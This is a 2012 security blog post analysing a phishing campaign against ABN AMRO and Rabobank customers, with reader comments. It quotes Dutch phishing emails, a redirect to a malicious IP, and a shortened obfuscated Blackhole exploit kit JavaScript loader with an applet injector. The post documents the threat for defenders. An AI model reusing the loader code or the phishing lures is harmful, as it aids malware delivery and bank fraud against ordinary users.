Massive email based threat (phishing) campaign targets ABN Amro/Rabobank users


Last update: 28/06/2012 22:50

MX Lab, http://www.mxlab.eu, started to intercept a new phishing email based threat campaign, based on the obfuscated Javascript technique, with the subjects like:

Da aanvraag voor afschrijving van 500 euro van Uw bankrekening bij de bank ABN AMRO
Het is nodig 500 euro van Uw bankrekening bij ABN AMRO te betalen
Het afschrijven van 500 euro van Uw rekening bij de bank ABN AMRO
De betaling van 500 euro van uw rekening bij de bank ABN AMRO
Urgente betaling van de levering over Uw rekening bij ABN AMRO

De emails are sent from spoofed addresses like “noanswer_022@rabobank.nl” where the nuber before the @-signs are chosen randomly.

The body of the email:

Geachte klant,
Wij hebben een aanvraag gekregen om 500 euro van Uw Rabobank rekening afteschrijven om de levering van de documenten te betalen.
Het afschrijven van het geld en het sturen van de documenten zal in 48 uren gebeuren.

Om het detail van de bestelling te zien klikt a.t.b. *hier* .
Om de bestelling terug te trekken, klikt a.t.b. *hier*.

Het detail van de bestelling:
Datum van verstuur: 26.06.2012
Afzender: Belastingsdienst
Type: expres

Met besten groeten,
Het dienst van klanten support van ABN AMRO.

The embedded URLs behind “* hier *” have a pattern like hxxp://domain.tld/abnamro.nl.html. At the moment, the URLs appear to be not working but caution is recommended when receiving such emails.

[UPDATE 28/06/2012 21:57]

Today we managed to get a bit further with new samples that have been intercepted. Here is some source code of the web site that is requested:

<meta http-equiv=”refresh” content=”0;url=’hxxp://37.58.83.141/index.php?tp=4d446573c1e75ec4′”></meta>
<html><head><title>Annuleren van bestelling, even geduld …</title></head><body><a href=”hxxp://37.58.83.141/index.php?tp=4d446573c1e75ec4″>Annuleren van bestelling, even geduld …</a></body></body></html>

When the request has been made to the host we got the error “501 Method Not Implemented”.

[UPDATE 28/06/2012 22:50]

Robin Vleij forwarded me some additional information and noted that this is a blackhole exploit kit based upon a report at  URLQuery http://www.urlquery.net/report.php?id=77515.

When I did some further investigation I captured the original HTML code that is present just before the “501 Method Not Implemented” message show up. I have found some obfuscated Javascript as well, clearly with the intention to install a malicious payload.

<html><body><script>try{v=prototype^2;}catch(v){x=1;}z=function(){md=”a”;if(window.document)e=”ev”;c=””;f=”fromChar”;
if(a)f=f+”Code”;
d=10;
for(i=15244-1;i>=0;i–){
w=i;
v=a[w];
k=v/((15244-i-1)%d+2);
c+=String[f](k);
}
e+=”al”;
if(x)window[e](c);}
g=””;
if(x)g=g+”295.164.120.96.1188.1120.1035.1000.413.246.240.192.144.112.
484.1160.891.808.798.630.500.404.342.190.”;
____SHORTENED____
if(x)g=g+”200″;
a=g.split(“.”);
z(123);
</script></body></html><script language=javascript>function StartApplet(){code = ‘1.class’;var a = document.createElement(‘applet’);a.setAttribute(‘code’, code);a.setAttribute(‘width’, 1);a.setAttribute(‘height’, 1);document.body.appendChild(a);}StartApplet();</script>

10 thoughts on “Massive email based threat (phishing) campaign targets ABN Amro/Rabobank users

  1. Got one too, I have a working URL and a dump of the javascript it tries to fetch. Contact me for a copy.

  2. A customer got several of this emails.
    The Emails are not only send from the @rabobank.nl od @abnamro.nl domain. I have noticed it allso from 2 customers send to the own domain email adres.

  3. My wife has got this e-mail to and clicked the links. She thought the pages on the links were not loading though. I did a full run of my anti-virus program but did not return any results. Is it ok to assume we’re in the safe now (and do normal banking again)?

    • My dad clicked it too (hence my research into what is was). It seems to be something called Blackhole Exploit, which seems a nasty bit of software that can exploit all kinds of stuff. My dad is running a Mac and a few days before that I updated it to the latest Lion update and updated all installed programs. Considering that Blackhole exploit has limited application to OSX and our Sophos AV couldn’t find anything, we continued using the machine without a re-install. I think my dad said he got a Google page when clicking on the link, so it could have been blocked by Chrome as well, not sure.

  4. would be a polite response if the banks contacted the victims to say if they have caught the hackers
    I’ve been getting this junk for years,.. from the same hackers who dish out viagra spam

    the email address’s the banks give to contact them do not have the good manners to respond even by normal mail with a postage stamp !!!

    but seeing as how they are the snotty condescending arrogant Banks of Holland ,..they think THEY are the government and above everyone

    They worry about the customers money??? Don’t think so !!!! their full of sh it
    We have a business for 18 years and they still do not lend to local people.
    Local Homo’s and drug dealers get loans no problem

  5. Another nice one below, which I just received. Disturbing text, but the link provided doesn’t work 🙂

    ABN-AMRO Alert – Uw Internetbankieren is geblokkeerd

    De ABN-AMRO spendeert veel aandacht en zorg aan de beveiliging en integriteit van al onze bankrekeningen.

    Graag vragen wij u dan ook aandacht voor het volgende. Afgelopen jaar is de ABN-AMRO, samen met veel andere nederlandse banken, doelwit geworden van grootschalig internetfraude. Daarom zijn wij afgelopen maanden een grootschalig project gestart om dit te bestrijden.

    Alle online bankrekeningen dienen te worden gekoppeld aan nieuw ontwikkeld beveiligingssysteem, waarmee verdachte bewegingen en ontwikkelingen op uw online bankrekening sneller worden getraceerd en opgelost.

    Er is geconstateerd dat uw online ABN-AMRO rekening nog niet voorzien is van het nieuwe beveiligingssysteem. Wij vragen u dan ook enkele minuten van uw tijd om deze update compleet te maken, om zo de beveiliging te voltooien.

    Gebruikt u onderstaande link: hxxp://abnmr.info/identification/inloggen

    Wanneer het gehele proces gereed is zal u weer als vanouds gebruik kunnen maken van het online bankieren via ABN AMRO.

    Wij willen u alvast bedanken voor uw medewerking.

    Hoogachtend,

    ABN-AMRO ONLINE
    Copyright (c) 2012, ABN AMRO NETHERLANDS. Alle rechten voorbehouden

    • I have disabled the URL in your post just to be sure. These guys sometimes show an error on the web page while obfuscated javascript is doing its job behind the scenes.

  6. I agree with the sentiments of your previous post by ‘pisedofftexpayer’ in so far as ABN AMRO give no warm fuzzy feedback to confirm ones concerns when we have phishing emails. I have had this phishing email this monring.

    De ABN-AMRO spendeert veel aandacht en zorg aan de beveiliging en integriteit van al onze bankrekeningen. Graag vragen wij u dan ook aandacht voor het volgende. Afgelopen jaar is de ABN AMRO, samen met veel andere nederlandse banken, doelwit geworden van grootschalig internetfraude. Daarom zijn wij afgelopen maanden een grootschalig project gestart om dit te bestrijden. Alle online bankrekeningen dienen te worden gekoppeld aan een nieuw ontwikkeld beveiligingssysteem, waarmee verdachte bewegingen en ontwikkelingen op uw online bankrekening sneller worden getraceerd en opgelost.

    Er is geconstateerd dat uw online ABN-AMRO rekening nog niet voorzien is van het nieuwe beveiligingssysteem.Wij vragen u dan ook 5-10 minuten van uw tijd om deze update compleet te maken, om zo de beveiliging te voltooien.

    Gebruikt u onderstaande link: Login Identificatie

    Na de update zal er door een van onze medewerkers nog contact met u worden opgenomen om het gehele proces te voltooien. Wanneer het gehele proces gereed is zal u weer als vanouds gebruik kunnen maken van het online bankieren via ABN-AMRO. Wij willen u alvast bedanken voor uw medewerking.

    Hoogachtend,

    Klantenservice

Comments are closed.